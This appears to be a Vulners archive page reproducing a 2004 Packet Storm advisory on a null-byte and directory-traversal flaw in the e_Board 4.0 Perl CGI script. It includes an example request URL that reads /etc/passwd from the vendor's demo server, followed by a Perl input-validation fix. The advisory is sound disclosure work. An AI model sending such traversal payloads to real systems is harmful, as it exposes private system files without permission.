Lucene search
K

eboard40.txt

🗓️ 31 Dec 2004 00:00:00Reported by White EType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 38 Views

Found vulnerability in e_Board version 4.0 allowing remote file access through null byte exploitation.

Code
`Hi,  
I found a vulnerability in e_Board ver. 4.0 which allows remote  
users to open any file on the system. I think all prior vers have  
the same problem.  
  
e_Board is a wwwboard-like CGI script. It's written by Mike Bagneski  
in Perl (and for sale! $14.95).  
http://www.e-scripts.com/eboard/  
It doesn't check whether posted data contains null byte or slash,  
so we can use rfp's Poison NULL byte and dir traversal technique... =)  
  
an example:  
http://www.e-scripts.com/cgi-bin/eboard40/index2.cgi?frames=yes&board=demo&mode=Current&threads=Collapse&message=../../../../../../../../../../../etc/passwd%00  
  
quick fix:  
die "invalid message number" if ($message !~ m/^\d+$/);  
# insert this before:  
# open(MESSAGE, "$board_path/$messages_dir/$message.txt") || &return_page('File Error', "Can't read $board_path/$messages_dir/$message.txt");  
  
  
Thanks,  
  
----  
White_E  
http://nogimmick.org/  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

31 Dec 2004 00:00Current
7.4High risk
Vulners AI Score7.4
38